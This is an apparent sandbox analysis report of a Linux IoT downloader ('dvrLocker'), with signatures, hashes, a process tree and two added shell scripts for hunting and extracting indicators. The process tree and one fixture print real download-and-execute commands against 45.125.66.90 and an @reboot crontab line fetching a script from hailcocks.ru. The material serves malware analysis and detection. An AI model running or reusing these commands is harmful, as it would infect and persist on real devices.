Analysis

Max time kernel: 149s
Max time network: 137s
Platform: debian-9_mips
Resource: debian9-mipsbe-20240418-en
Resource tags: arch:mips, image:debian9-mipsbe-20240418-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mips, system
Submitted: 27/11/2024, 02:39
Static task: static1

Behavioral tasks (sample 6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown in every case):
  behavioral1: ubuntu1804-amd64-20240611-en
  behavioral2: debian9-armhf-20240729-en
  behavioral3: debian9-mipsbe-20240418-en
  behavioral4: debian9-mipsel-20240226-en

The signatures and process tree on this page come from behavioral3, the debian9-mipsbe-20240418-en resource named under Analysis above.
General

Target: 6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown
Size: 913B
MD5: c18ef2271ad912c7542293151373ffa0
SHA1: 65fb65c17671657fc431173051fe794c6c63007d
SHA256: 6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b
SHA512: fb9a3ec37ee5f8f71b343285f034a6c27520fdc6525b217b411023b4c9741282cd36354442853caa50a2d2fe54dfb6e8f8453f36cdd773573435062f82bcdfc9
Malware Config
Signatures

File and Directory Permissions Modification (1 TTP, 22 IoCs)
Adversaries may modify file or directory permissions to evade defenses.
  PID  Process
  815  chmod
  829  chmod
  832  sh
  844  chmod
  854  chmod
  858  chmod
  862  chmod
  866  chmod
  871  chmod
  875  chmod
  879  chmod
  883  chmod
  887  chmod
  891  chmod
  895  chmod
  899  chmod
  903  chmod
  907  chmod
  911  chmod
  915  chmod
  919  chmod
  923  chmod

Executes dropped EXE (7 IoCs)
  IoC                 PID  Process
  /tmp/lib/dvrLocker  816  dvrLocker
  /tmp/lib/dvrLocker  830  dvrLocker
  /tmp/lib/dvrLocker  848  dvrLocker
  /tmp/lib/dvrLocker  855  dvrLocker
  /tmp/lib/dvrLocker  859  dvrLocker
  /tmp/lib/dvrLocker  863  dvrLocker
  /tmp/lib/dvrLocker  867  dvrLocker

Renames itself (1 IoC)
  PID  Process
  830  dvrLocker

Unexpected DNS network traffic destination (1 IoC)
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
  Description     IoC
  Destination IP  81.169.136.222

Creates/modifies Cron job (1 TTP, 1 IoC)
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
  Description                   IoC                                  Process
  File opened for modification  /var/spool/cron/crontabs/tmp.hCusdS  crontab

Changes its process name (1 IoC)
  Description                                                      IoC           PID  Process
  Changes the process name, possibly in an attempt to hide itself  [watchdog/0]  830  dvrLocker

Reads runtime system information (heading recovered from the signature tags in the process tree below; the page does not carry an IoC count for it; repeated opens of the same file by the same process are collapsed)
  Description              IoC                                                                         Process
  File opened for reading  /proc/<pid>/status for pid in 841, 842, 843, 846, 849, 850, 851, 852, 856, 866, 867, 868, 870, 873, 880, 882, 885, 886, 893, 895, 898, 899, 903, 906, 910, 911, 912, 918, 919, 920, 922, 923, 924, 925, 926  dvrLocker
  File opened for reading  /proc/2/cmdline, /proc/704/cmdline (704 is the dropper script itself), /proc/847/cmdline  dvrLocker
  File opened for reading  /proc/mounts                                                                dvrLocker
  File opened for reading  /proc/filesystems                                                           ls, mkdir, crontab

System Network Configuration Discovery (1 TTP, 5 IoCs)
Adversaries may gather information about the network configuration of a system.
  PID  Process
  821  wget
  840  rm
  874  wget
  877  rm
  905  rm

Writes file to tmp directory (1 IoC)
Malware often drops required files in the /tmp directory.
  Description                   IoC                 Process
  File opened for modification  /tmp/lib/dvrLocker  6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown
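Three of the signatures above are the ones that matter when sweeping other hosts: the @reboot crontab line that fetches and runs a script, the payload renaming itself to [watchdog/0], and the chmod 777 on the dropped dvrLocker. The POSIX sh script below is an added example, not part of this report or of the sample, that checks a host for exactly those artifacts. It assumes a standard /proc layout; the function names are mine, and the fixture it builds is constructed to mirror the report's artifacts, not captured from the sandbox. The kernel-thread check relies on a fact about Linux, not on the sample: genuine kernel threads have an empty /proc/PID/cmdline and a comm with no brackets (ps adds the brackets for display), so any process whose comm or argv[0] literally starts with "[" is a userland binary imitating one.

```shell
#!/bin/sh
# hunt_dvrlocker.sh -- added example, not part of the sandbox report or of
# the sample. Looks for the artifacts the report shows the dropper leaving:
#   1. a crontab line that fetches a script over HTTP and runs it
#   2. a process named like a kernel thread ("[watchdog/0]") but backed by
#      a real executable
#   3. a mode-0777 file under /tmp or /mnt (the dropped dvrLocker)
# Every check takes a root directory so it can run against a constructed
# tree. On a live host set HUNT_ROOT=/ and run as root, otherwise the
# /proc/PID/exe links of other users' processes are not readable.
# Assumptions: standard /proc layout; POSIX sh with find, grep -E, readlink.

# 1. Cron entries that download before they run. Covers the per-user spool
#    the sample wrote to (/var/spool/cron/crontabs/) and the system-wide files.
find_cron_downloaders() {
    root="$1"
    for f in "$root"/var/spool/cron/crontabs/* "$root"/var/spool/cron/* \
             "$root"/etc/cron.d/* "$root"/etc/crontab; do
        [ -f "$f" ] || continue
        grep -E '(wget|curl|tftp|ftpget)[^#]*https?://' "$f" 2>/dev/null \
            | sed "s|^|$f: |"
    done
}

# 2. Kernel-thread masquerade: comm or argv[0] starting with "[" is never a
#    real kernel thread (their cmdline is empty and comm has no brackets).
#    Print the offender with the binary behind it when the exe link resolves.
find_fake_kthreads() {
    root="$1"
    for d in "$root"/proc/[0-9]*; do
        comm=$(cat "$d/comm" 2>/dev/null) || continue
        argv0=""
        if [ -r "$d/cmdline" ]; then
            argv0=$(tr '\000' '\n' < "$d/cmdline" | head -n 1)
        fi
        fake=0
        case "$comm" in \[*) fake=1 ;; esac
        case "$argv0" in \[*) fake=1 ;; esac
        [ "$fake" -eq 1 ] || continue
        exe=$(readlink "$d/exe" 2>/dev/null) || exe="(not readable)"
        echo "${d##*/} comm=$comm argv0=$argv0 exe=$exe"
    done
}

# 3. World-writable, world-executable files in the two drop directories the
#    sample uses (it chmod 777s dvrLocker before every run).
find_777_droppings() {
    root="$1"
    for dir in "$root"/tmp "$root"/mnt; do
        [ -d "$dir" ] || continue
        find "$dir" -type f -perm -0777 2>/dev/null || true
    done
}

# Constructed fixture (not captured from the sandbox): a scratch tree with the
# same three artifacts, so the checks can be exercised offline.
make_fixture() {
    fx=$(mktemp -d)
    mkdir -p "$fx/var/spool/cron/crontabs" "$fx/proc/1" "$fx/proc/2" \
             "$fx/proc/830" "$fx/tmp/lib" "$fx/mnt"
    # the crontab line PID 832 installed, as recorded in the process tree
    printf '%s\n' '@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh' \
        > "$fx/var/spool/cron/crontabs/root"
    # PID 1: ordinary userland process, must not be flagged
    printf 'init\n' > "$fx/proc/1/comm"
    printf '/sbin/init\000' > "$fx/proc/1/cmdline"
    ln -s /sbin/init "$fx/proc/1/exe"
    # PID 2: genuine kernel thread: plain comm, empty cmdline, no exe link
    printf 'kthreadd\n' > "$fx/proc/2/comm"
    : > "$fx/proc/2/cmdline"
    # PID 830: dvrLocker after renaming itself, per the report
    printf '[watchdog/0]\n' > "$fx/proc/830/comm"
    printf '[watchdog/0]\000' > "$fx/proc/830/cmdline"
    ln -s "$fx/tmp/lib/dvrLocker" "$fx/proc/830/exe"
    : > "$fx/tmp/lib/dvrLocker"
    chmod 777 "$fx/tmp/lib/dvrLocker"
    echo "$fx"
}

hunt() {
    root="$1"
    echo "== cron entries fetching remote scripts (root: $root)"
    find_cron_downloaders "$root"
    echo "== processes named like kernel threads but backed by a binary"
    find_fake_kthreads "$root"
    echo "== mode-0777 files under tmp and mnt"
    find_777_droppings "$root"
}

# Scan HUNT_ROOT when set (HUNT_ROOT=/ on a live box); otherwise demonstrate
# against the constructed fixture.
hunt "${HUNT_ROOT:-$(make_fixture)}"
```

Run as `HUNT_ROOT=/ sh hunt_dvrlocker.sh` on a suspect box. A hit from the second check is the strong one: there is no legitimate reason for a process to carry a bracketed name, and the exe target tells you where the binary lives even after the script has deleted the per-architecture download files.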
Processes

One line per process: image: command line (PID) [matched signatures]; indentation is the depth in the tree. The tree has gaps (for example no wget precedes the rm -rf arm at PID 852, and PIDs 902, 906, 910 and 914 are absent): the sandbox did not record those processes, and they are not reconstructed here.

/tmp/6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown: /tmp/6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown (PID 704) [Writes file to tmp directory]
  /bin/ls: ls -l /proc/1/exe (PID 706)
  /bin/ls: ls -l /proc/10/exe (PID 712)
  /bin/ls: ls -l /proc/11/exe (PID 715) [Reads runtime system information]
  /bin/ls: ls -l /proc/110/exe (PID 719) [Reads runtime system information]
  /bin/ls: ls -l /proc/12/exe (PID 722) [Reads runtime system information]
  /bin/ls: ls -l /proc/126/exe (PID 726)
  /bin/ls: ls -l /proc/127/exe (PID 729)
  /bin/ls: ls -l /proc/13/exe (PID 731)
  /bin/ls: ls -l /proc/14/exe (PID 733)
  /bin/ls: ls -l /proc/15/exe (PID 735)
  /bin/ls: ls -l /proc/152/exe (PID 736)
  /bin/ls: ls -l /proc/159/exe (PID 739)
  /bin/ls: ls -l /proc/16/exe (PID 741) [Reads runtime system information]
  /bin/ls: ls -l /proc/17/exe (PID 742) [Reads runtime system information]
  /bin/ls: ls -l /proc/176/exe (PID 744) [Reads runtime system information]
  /bin/ls: ls -l /proc/18/exe (PID 745)
  /bin/ls: ls -l /proc/19/exe (PID 746)
  /bin/ls: ls -l /proc/2/exe (PID 748)
  /bin/ls: ls -l /proc/20/exe (PID 749)
  /bin/ls: ls -l /proc/21/exe (PID 750) [Reads runtime system information]
  /bin/ls: ls -l /proc/22/exe (PID 751)
  /bin/ls: ls -l /proc/23/exe (PID 752)
  /bin/ls: ls -l /proc/24/exe (PID 753)
  /bin/ls: ls -l /proc/243/exe (PID 754)
  /bin/ls: ls -l /proc/3/exe (PID 755) [Reads runtime system information]
  /bin/ls: ls -l /proc/330/exe (PID 756)
  /bin/ls: ls -l /proc/333/exe (PID 757) [Reads runtime system information]
  /bin/ls: ls -l /proc/334/exe (PID 758)
  /bin/ls: ls -l /proc/336/exe (PID 759)
  /bin/ls: ls -l /proc/337/exe (PID 760) [Reads runtime system information]
  /bin/ls: ls -l /proc/36/exe (PID 761) [Reads runtime system information]
  /bin/ls: ls -l /proc/37/exe (PID 762) [Reads runtime system information]
  /bin/ls: ls -l /proc/389/exe (PID 763)
  /bin/ls: ls -l /proc/391/exe (PID 764)
  /bin/ls: ls -l /proc/394/exe (PID 765)
  /bin/ls: ls -l /proc/399/exe (PID 766)
  /bin/ls: ls -l /proc/4/exe (PID 767)
  /bin/ls: ls -l /proc/402/exe (PID 768) [Reads runtime system information]
  /bin/ls: ls -l /proc/5/exe (PID 769) [Reads runtime system information]
  /bin/ls: ls -l /proc/6/exe (PID 770) [Reads runtime system information]
  /bin/ls: ls -l /proc/661/exe (PID 771)
  /bin/ls: ls -l /proc/674/exe (PID 772)
  /bin/ls: ls -l /proc/677/exe (PID 773)
  /bin/ls: ls -l /proc/679/exe (PID 774)
  /bin/ls: ls -l /proc/680/exe (PID 775)
  /bin/ls: ls -l /proc/696/exe (PID 776) [Reads runtime system information]
  /bin/ls: ls -l /proc/697/exe (PID 777)
  /bin/ls: ls -l /proc/699/exe (PID 778) [Reads runtime system information]
  /bin/ls: ls -l /proc/7/exe (PID 779) [Reads runtime system information]
  /bin/ls: ls -l /proc/70/exe (PID 780)
  /bin/ls: ls -l /proc/701/exe (PID 781)
  /bin/ls: ls -l /proc/702/exe (PID 782)
  /bin/ls: ls -l /proc/703/exe (PID 783) [Reads runtime system information]
  /bin/ls: ls -l /proc/704/exe (PID 784) [Reads runtime system information]
  /bin/ls: ls -l /proc/705/exe (PID 785) [Reads runtime system information]
  /bin/ls: ls -l /proc/71/exe (PID 786)
  /bin/ls: ls -l /proc/72/exe (PID 787)
  /bin/ls: ls -l /proc/73/exe (PID 788)
  /bin/ls: ls -l /proc/74/exe (PID 789)
  /bin/ls: ls -l /proc/75/exe (PID 790)
  /bin/ls: ls -l /proc/76/exe (PID 791)
  /bin/ls: ls -l /proc/77/exe (PID 792)
  /bin/ls: ls -l /proc/78/exe (PID 793)
  /bin/ls: ls -l /proc/79/exe (PID 794)
  /bin/ls: ls -l /proc/8/exe (PID 796) [Reads runtime system information]
  /bin/ls: ls -l /proc/82/exe (PID 798)
  /bin/ls: ls -l /proc/9/exe (PID 800) [Reads runtime system information]
  /bin/rm: rm -rf /tmp/lib/ (PID 802)
  /bin/rm: rm -rf /tmp/lib/dvrLocker (PID 803)
  /bin/mkdir: mkdir /tmp/lib/ (PID 805) [Reads runtime system information]
  /usr/bin/wget: wget http://45.125.66.90/mpsl -O - (PID 807)
  /bin/chmod: chmod 777 dvrLocker (PID 815) [File and Directory Permissions Modification]
  /tmp/lib/dvrLocker: ./dvrLocker tplink.new (PID 816) [Executes dropped EXE]
  /bin/rm: rm -rf mpsl (PID 819)
  /usr/bin/wget: wget http://45.125.66.90/mips -O - (PID 821) [System Network Configuration Discovery]
  /bin/chmod: chmod 777 dvrLocker (PID 829) [File and Directory Permissions Modification]
  /tmp/lib/dvrLocker: ./dvrLocker tplink.new (PID 830) [Executes dropped EXE; Renames itself; Changes its process name; Reads runtime system information]
    /bin/sh: sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -" (PID 832) [File and Directory Permissions Modification]
      /usr/bin/crontab: crontab - (PID 834) [Creates/modifies Cron job; Reads runtime system information]
      /usr/bin/crontab: crontab -l (PID 835)
  /bin/rm: rm -rf mips (PID 840) [System Network Configuration Discovery]
  /bin/chmod: chmod 777 dvrLocker (PID 844) [File and Directory Permissions Modification]
  /tmp/lib/dvrLocker: ./dvrLocker tplink.new (PID 848) [Executes dropped EXE]
  /bin/rm: rm -rf arm (PID 852)
  /usr/bin/wget: wget http://45.125.66.90/arm5 -O - (PID 853)
  /bin/chmod: chmod 777 dvrLocker (PID 854) [File and Directory Permissions Modification]
  /tmp/lib/dvrLocker: ./dvrLocker tplink.new (PID 855) [Executes dropped EXE]
  /bin/rm: rm -rf arm5 (PID 856)
  /usr/bin/wget: wget http://45.125.66.90/ppc -O - (PID 857)
  /bin/chmod: chmod 777 dvrLocker (PID 858) [File and Directory Permissions Modification]
  /tmp/lib/dvrLocker: ./dvrLocker tplink.new (PID 859) [Executes dropped EXE]
  /bin/rm: rm -rf ppc (PID 860)
  /usr/bin/wget: wget http://45.125.66.90/arm7 -O - (PID 861)
  /bin/chmod: chmod 777 dvrLocker (PID 862) [File and Directory Permissions Modification]
  /tmp/lib/dvrLocker: ./dvrLocker tplink.new (PID 863) [Executes dropped EXE]
  /bin/rm: rm -rf arm7 (PID 864)
  /usr/bin/wget: wget http://45.125.66.90/arm6 -O - (PID 865)
  /bin/chmod: chmod 777 dvrLocker (PID 866) [File and Directory Permissions Modification]
  /tmp/lib/dvrLocker: ./dvrLocker tplink.new (PID 867) [Executes dropped EXE]
  /bin/rm: rm -rf arm6 (PID 868)
  /bin/rm: rm -rf /mnt/dvrLocker (PID 869)
  /usr/bin/wget: wget http://45.125.66.90/mpsl -O - (PID 870)
  /bin/chmod: chmod 777 dvrLocker (PID 871) [File and Directory Permissions Modification]
  /mnt/dvrLocker: ./dvrLocker tplink.new (PID 872)
  /bin/rm: rm -rf mpsl (PID 873)
  /usr/bin/wget: wget http://45.125.66.90/mips -O - (PID 874) [System Network Configuration Discovery]
  /bin/chmod: chmod 777 dvrLocker (PID 875) [File and Directory Permissions Modification]
  /mnt/dvrLocker: ./dvrLocker tplink.new (PID 876)
  /bin/rm: rm -rf mips (PID 877) [System Network Configuration Discovery]
  /usr/bin/wget: wget http://45.125.66.90/arm -O - (PID 878)
  /bin/chmod: chmod 777 dvrLocker (PID 879) [File and Directory Permissions Modification]
  /mnt/dvrLocker: ./dvrLocker tplink.new (PID 880)
  /bin/rm: rm -rf arm (PID 881)
  /usr/bin/wget: wget http://45.125.66.90/arm5 -O - (PID 882)
  /bin/chmod: chmod 777 dvrLocker (PID 883) [File and Directory Permissions Modification]
  /mnt/dvrLocker: ./dvrLocker tplink.new (PID 884)
  /bin/rm: rm -rf arm5 (PID 885)
  /usr/bin/wget: wget http://45.125.66.90/ppc -O - (PID 886)
  /bin/chmod: chmod 777 dvrLocker (PID 887) [File and Directory Permissions Modification]
  /mnt/dvrLocker: ./dvrLocker tplink.new (PID 888)
  /bin/rm: rm -rf ppc (PID 889)
  /usr/bin/wget: wget http://45.125.66.90/arm7 -O - (PID 890)
  /bin/chmod: chmod 777 dvrLocker (PID 891) [File and Directory Permissions Modification]
  /mnt/dvrLocker: ./dvrLocker tplink.new (PID 892)
  /usr/bin/wget: wget http://45.125.66.90/arm6 -O - (PID 894)
  /bin/chmod: chmod 777 dvrLocker (PID 895) [File and Directory Permissions Modification]
  /mnt/dvrLocker: ./dvrLocker tplink.new (PID 896)
  /bin/rm: rm -rf arm6 (PID 897)
  /usr/bin/wget: wget http://45.125.66.90/mpsl -O - (PID 898)
  /bin/chmod: chmod 777 dvrLocker (PID 899) [File and Directory Permissions Modification]
  /mnt/dvrLocker: ./dvrLocker tplink.new (PID 900)
  /bin/rm: rm -rf mpsl (PID 901)
  /bin/chmod: chmod 777 dvrLocker (PID 903) [File and Directory Permissions Modification]
  /mnt/dvrLocker: ./dvrLocker tplink.new (PID 904)
  /bin/rm: rm -rf mips (PID 905) [System Network Configuration Discovery]
  /bin/chmod: chmod 777 dvrLocker (PID 907) [File and Directory Permissions Modification]
  /mnt/dvrLocker: ./dvrLocker tplink.new (PID 908)
  /bin/rm: rm -rf arm (PID 909)
  /bin/chmod: chmod 777 dvrLocker (PID 911) [File and Directory Permissions Modification]
  /mnt/dvrLocker: ./dvrLocker tplink.new (PID 912)
  /bin/rm: rm -rf arm5 (PID 913)
  /bin/chmod: chmod 777 dvrLocker (PID 915) [File and Directory Permissions Modification]
  /mnt/dvrLocker: ./dvrLocker tplink.new (PID 916)
  /bin/rm: rm -rf ppc (PID 917)
  /usr/bin/wget: wget http://45.125.66.90/arm7 -O - (PID 918)
  /bin/chmod: chmod 777 dvrLocker (PID 919) [File and Directory Permissions Modification]
  /mnt/dvrLocker: ./dvrLocker tplink.new (PID 920)
  /bin/rm: rm -rf arm7 (PID 921)
  /usr/bin/wget: wget http://45.125.66.90/arm6 -O - (PID 922)
  /bin/chmod: chmod 777 dvrLocker (PID 923) [File and Directory Permissions Modification]
  /mnt/dvrLocker: ./dvrLocker tplink.new (PID 924)
  /bin/rm: rm -rf arm6 (PID 925)
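The tree above is the whole behaviour of the 913-byte sample: it is a downloader script, not a compiled payload. After listing /proc/<pid>/exe for every running process it cycles through the architecture tags mpsl, mips, arm, arm5, ppc, arm7 and arm6 without checking the CPU type first (no uname or /proc/cpuinfo read appears anywhere), and for each tag fetches http://45.125.66.90/<tag> with wget -O -, evidently redirecting the bytes into dvrLocker, chmod 777s it, runs it with the argument tplink.new and deletes the tag file, first under /tmp/lib and then again under /mnt. Only the mips payload (PID 830) shows further activity (renaming itself to [watchdog/0] and spawning the crontab install), consistent with it being the one built for the mipsbe sandbox. The POSIX sh script below is an added example, not code from the report or the sample: it turns a listing in this form into the indicators a blocklist or host sweep needs. The sample lines are copied from the tree, laid out as image, command line and PID; the function names, the layout assumption (one process per line, URLs unquoted) and the server address parameter of extract_arch_tags are mine.

```shell
#!/bin/sh
# iocs_from_proctree.sh -- added example, not from the report or the sample.
# Reads a process listing (one process per line, as laid out in the tree
# above: "<image>: <command line> (PID n)") and extracts download URLs, the
# hosts behind them, the architecture tags the dropper cycles through and
# the paths it drops to. Format assumptions are mine, not the sandbox's.

# Every http(s) URL, once, sorted. The allowed character set ends a URL at
# the quote, backslash, space, semicolon or parenthesis that follows it in
# the crontab one-liner.
extract_urls() {
    grep -oE 'https?://[[:alnum:]._/:%?&=-]+' | sort -u
}

# Host part (name or IP) of each URL, once.
extract_hosts() {
    extract_urls | sed -E 's#^https?://([^/]+).*#\1#' | sort -u
}

# Architecture tags: last path component of the URLs on the payload server.
# The default server is the one in this report; pass another as $1.
extract_arch_tags() {
    server="${1:-45.125.66.90}"
    extract_urls | grep -F "://$server/" | sed 's#.*/##' | sort -u
}

# Paths under /tmp or /mnt that the script creates, removes or executes.
extract_dropped_paths() {
    grep -oE '(/tmp|/mnt)/[A-Za-z0-9_./-]+' | sort -u
}

# Constructed input: lines copied from the process tree above, one wget per
# architecture tag plus the crontab install and the /mnt stage.
SAMPLE_TREE='/usr/bin/wget: wget http://45.125.66.90/mpsl -O - (PID 807)
/bin/chmod: chmod 777 dvrLocker (PID 815)
/tmp/lib/dvrLocker: ./dvrLocker tplink.new (PID 816)
/bin/rm: rm -rf mpsl (PID 819)
/usr/bin/wget: wget http://45.125.66.90/mips -O - (PID 821)
/bin/sh: sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -" (PID 832)
/usr/bin/wget: wget http://45.125.66.90/arm -O - (PID 878)
/usr/bin/wget: wget http://45.125.66.90/arm5 -O - (PID 853)
/usr/bin/wget: wget http://45.125.66.90/ppc -O - (PID 857)
/usr/bin/wget: wget http://45.125.66.90/arm7 -O - (PID 861)
/usr/bin/wget: wget http://45.125.66.90/arm6 -O - (PID 865)
/bin/rm: rm -rf /mnt/dvrLocker (PID 869)
/mnt/dvrLocker: ./dvrLocker tplink.new (PID 872)'

# Print all four indicator sets for a listing (defaults to SAMPLE_TREE).
report() {
    listing="${1:-$SAMPLE_TREE}"
    echo "== URLs";              printf '%s\n' "$listing" | extract_urls
    echo "== hosts";             printf '%s\n' "$listing" | extract_hosts
    echo "== architecture tags"; printf '%s\n' "$listing" | extract_arch_tags
    echo "== dropped paths";     printf '%s\n' "$listing" | extract_dropped_paths
}

report
```

For a listing exported from another report, pass it as the argument: `report "$(cat listing.txt)"`. The architecture tag set is the useful pivot: a dropper that requests the same seven tags from a different server is the same loader with its payload host changed, which a URL-only blocklist would miss.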
Network
MITRE ATT&CK Enterprise v15
Downloads

Download 1
  Filesize: 100KB
  MD5: 4ad582d49f505bfab7de84881998685b
  SHA1: 5f09f4baed114b594729ded91e2c4d263f0e2754
  SHA256: b1e8713db49c15b272baa11e5569ecb4f22fd6064f5aa59ed236d0af58f159a1
  SHA512: 6f35bfb8aca5fd02f6e690fe0628595531dba7463265b1a66ff801c7744690f3317f611ab07e45fdfc28a17a32a891de92b1d026de30bf327aa304395b0905f4

Download 2
  Filesize: 99KB
  MD5: 559f129d380ad1cfb60792c6b2dc3d32
  SHA1: 3997a0fc0bd5958783f1751364ec407c5b170adc
  SHA256: fbdbd0392519e49a09e647d8c83046fb15d6dcbb8246ee2f813d10018ba8ac3d
  SHA512: 9f5c39334121b5bde6a282f47b92a841130627f1554ff5089005c371af4c2be5ddc467ad594013fa2fb70a55172b6ba7a6caf50c0cba56564170e482955dc112

Download 3
  Filesize: 306B
  MD5: 52e1ad18d178f2dcf0faeda00070f21e
  SHA1: c683c24e4fe9a0ed77cb7623e061d86179185397
  SHA256: d34450689b23cae53222c9fc6c976d4b7a72ede1c77caea45659a2cb3387f9a1
  SHA512: 112c995b57dffa2713a0d5610d90b55b70d56703b66b970bf1f7d82b74c5518770882c3d43c23286cdc1fce7acb4b55c4d6b3e71f9513e8052437caeaf6c0ffa